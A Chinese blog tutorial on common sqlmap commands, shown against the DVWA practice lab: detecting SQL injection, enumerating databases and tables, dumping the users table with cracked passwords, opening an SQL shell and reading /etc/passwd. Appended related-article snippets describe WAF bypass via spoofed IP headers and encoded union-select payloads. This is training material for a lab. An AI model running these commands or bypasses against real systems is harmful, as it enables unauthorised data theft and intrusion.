sqlmap 常用姿势

最新推荐文章于 2025-03-22 02:18:22 发布
最新推荐文章于 2025-03-22 02:18:22 发布
阅读量264 收藏 2
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 渗透测试 文章标签: 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/pentestnotes/article/details/118556510
sqlmap是一款开源的渗透测试工具,用于检测和利用SQL注入漏洞。本文介绍了如何使用sqlmap进行SQL注入检测,包括指定URL、参数,获取数据库信息、数据库名,列举表以及表中的数据,执行自定义SQL语句和读取文件等操作,展示了其在dvwa靶场上的应用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

sqlmap 是一种开源渗透测试工具,可自动执行检测和利用 SQL 注入缺陷以及接管数据库服务器的过程。它配备了强大的检测引擎、许多适用于最终渗透测试人员的利基功能,以及广泛的开关,包括数据库指纹、从数据库获取数据、访问底层文件系统以及通过输出在操作系统上执行命令。

来自 Github

项目地址 https://github.com/sqlmapproject/sqlmap

下载即可使用,需要安装 python

一些基础用法

这里使用常用漏洞靶场 dvwa 作为演示

检测是否存在注入

 sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#"

  • -u 指定要检测的 url,sqlmap 就会自动检测尝试可注入的参数

  • 也可以添加 -p 指定参数,这里为 -p "id"

完整命令为

 sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id"

由于 dvwa 需要登录,所以还需要指定 cookie,需要添加 --cookie

sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#"  -p "id" --cookie "PHPSESSID=0q2n2t8jccdulkn6rssl553rg2; security=low"

执行,提示 id 存在 sql 注入,并显示了注入的 payload。

获取数据库信息

上一步得出存在注入,那么便可以更进一步,获取更多信息了。比如获取该网站当前使用的数据库名,使用如下命令。

sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0q2n2t8jccdulkn6rssl553rg2; security=low" --batch --current-db

  • --batch 表示默认全部确定,这样就不会出现确认提示

  • --current-db 表示获取当前数据库名

可以看到很快就获取到了,当前数据库名为 dvwa

继续列出所有数据库。

sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0q2n2t8jccdulkn6rssl553rg2; security=low" --batch --dbs

  • --dbs 列出所有数据库

一共有两个数据库。

获取表以及表中的数据

获取到数据库信息之后,进一步获取数据表信息,以及数据。

枚举指定数据库中所有的表。

sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0q2n2t8jccdulkn6rssl553rg2; security=low" --batch -D "dvwa" --tables

  • -D 指定数据库,后接数据库名

  • --tables 列出所有表

一共获取到两张表。

枚举指定表的所有数据。

sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0q2n2t8jccdulkn6rssl553rg2; security=low" --batch -D "dvwa" -T "users" --dump

获取到 users 表的数据,并且 sqlmap 帮我们自动解密了密码。

执行 sql 语句以及读取文件

我们也可以执行一些自定义的 sql 语句。

sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0q2n2t8jccdulkn6rssl553rg2; security=low" --sql-shell

上面语句执行后,将会打开一个 sql shell,供我们执行 sql 命令。

还可以直接读取文件,例如读取 /etc/passwd。

sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0q2n2t8jccdulkn6rssl553rg2; security=low" --batch --file-read "/etc/passwd"

  • --file-read 表示读取文件,参数为文件绝对路径

显示文件读取成功,被保存到本地。

打开该文件即可看到读取下来的内容。

以上就是 sql 常见用法了。

sqlmap之waf绕过
qi_SJQ_的博客
11-12 1万+
白名单: 方式一:IP白奖单 从网络层获取的ip,这种一般伪造不来,如果是获取客户端的IP,这样就可能存在伪造IP绕过的情况。 测试方法:修改http的header来bypass waf x-forwarded-for x-remote-IP x-originating-IP x-remote-addr x-Real-ip   方式二:静态资源 特定的静态资源后缀请求,常见的静态文件(.js .jpg .swf .css等等),类似白名单机制,waf为了检测效率,不去检测这样一些静态文件名...
<小迪安全>19-SQL注入之sqlmap绕过WAF
hackerXxxt的博客
03-17 1097
1.白名单方式一:IP白奖单从网络层获取的ip,这种一般伪造不来,如果是获取客户端的IP,这样就可能存在伪造IP绕过的情况。测试方法:修改http的header来bypass wafx-Real-ip方式二:静态资源特定的静态资源后缀请求,常见的静态文件(.js .jpg .swf .css等等),类似白名单机制,waf为了检测效率,不去检测这样一些静态文件名后缀的请求。id=1id=1备注: Aspx/php只识别到前面的.aspx/.php后面基本不识别。
SQLmap常用命令
05-08
sqlmap是一个自动化的sql注入渗透工具,指纹检测、注入方式、注入成功后的取数据等等都是自动化的,甚至还提供了一个字典来将取回来的hash爆破,当然对于真实环境中这爆破功能战斗力基本为0....
干货 | Sqlmap常用手册(收藏)
2302_76672693的博客
12-18 1145
干货 | Sqlmap常用手册(收藏)
SQLMAP的下载安装和使用(Windows)
最新发布
m0_74822999的博客
03-22 1261
SQLMAP是一种开源渗透测试工具,可自动执行SQL注入缺陷的检测和注入过程,并接管数据库服务器。它有强大的检测引擎,针对不同类型的数据库提供多样的渗透测试功能选项,实现数据库识别、数据获取、访问DBMS操作系统甚至通过带外数据连接的方式执行操作系统的命令,以及从数据库指纹识别、从数据库获取数据、 通过带外连接在操作系统上执行命令。
sqlmap常用总结
JDWDXN的博客
10-05 478
sqlmap使用 sqlmap --help 查看帮助 -u 检测url是否有注入点 sqlmap -u “http://192.168.61.149/Less-1/?id=1” 无损测试,并且列出一些测试例子
sqlmap常用命令
PromisingQ
07-09 499
本文是作者在一次实训后,将实训老师给的pdf上的内容摘录而来,方便以后学习查看,若侵权请联系作者删除 帮助 sqlmap -h sqlmap -hh #高级帮助 官方最新文档:http://sqlmap.sourceforge.net/doc/README.html 基本步骤 sqlmap -u “http://url/news?id=1” --current-user #获取当前用户名称 sqlmap -u “http://www.xxoo.com/news?id=1” --current-d.
第19天-WEB漏洞-SQL注入之SQLMAP绕过WAF
MCTSOG的博客
03-03 2044
在攻防实战中,往往需要掌握一些特性,比如服务器、数据库、应用层、WAF 层等,以便我们更灵活地去构造 Payload,从而可以和各种WAF 进行对抗,甚至绕过安全防御措施进行漏洞利用。 数据库特性(补充) %23x%0aunion%23x%0Aselect%201,2,3 %20/!44509union/%23x%0aselect%201,2,3 id=1/**&id=-1%20union%20select%201,2,3%23*/ %20union%20all%23%0a%20select%20
CTF Web各种题目的解题姿势
07-27
课时11:SQL注入常用基础Trick18'15 第2章 代码执行与命令执行 课时1:代码执行介绍49'32 课时2:命令执行介绍20'14 课时3:命令执行分类20'12 课时4:命令执行技巧24'30 课时5:长度限制的命令执行25'46 ...
sqlmap使用, 靶场测试
萍水间人的小天地
04-07 1057
参考 sqlmap使用教程 sqlmap使用手册 之前的一篇文章 小白的SQL注入中, 我用了一些常规的手法, 检测是否有注入 爆表的字段数 利用表的字段数目爆数据库和所有的表 然后利用union查询flag表的信息 其实这些过程是可以利用一个自动化注入工具来完成的 sqlmap 检查注入点 使用-u参数, -u URL 爆所有数据库信息 -dbs 爆当前数据库信息 --cu...
sqlmap常用语句
08-14
sqlmap常用语句sqlmap常用语句
sqlmap使用大全
11-25
sqlmap使用大全,帮助使用aqlmap,非常有用的一个文档
sqlmap常用使用方法
paradise
03-05 747
slqmap常用使用方法 Usage: python sqlmap [options] Options: -h, --help 帮助 -hh 帮助 --version 版本 -v VERBOSE 显示Verbosity level: 0-6 (default 1) -u...
sqlmap使用
s_daqing的博客
09-03 457
sqlmap -u http://xxxxxxxxxxxx/ShowNews.aspx?Id=746 --smart --batch --tamper=space2comment --user-agent=“Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.380...
【每天学习一点新知识】sqlmap的使用
RexHa的博客
10-04 616
sqlmap的基本使用
sqlmap基本常用技巧(非常详细)零基础入门到精通,收藏这一篇就够了
logic1001的博客
04-19 1851
作用:使用指定的注入方式,支持多种注入检测,默认是全部比如:有些SQL注入点只允许时间注入,这时就指定注入类型为T–technique参数值解释B:Boolean-basedblindSQLinjection(布尔型注入)E:Error-basedSQLinjection(报错型注入)U:UNIONquerySQLinjection(可联合查询注入)S:StackedqueriesSQLinjection(可多语句查询注入)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值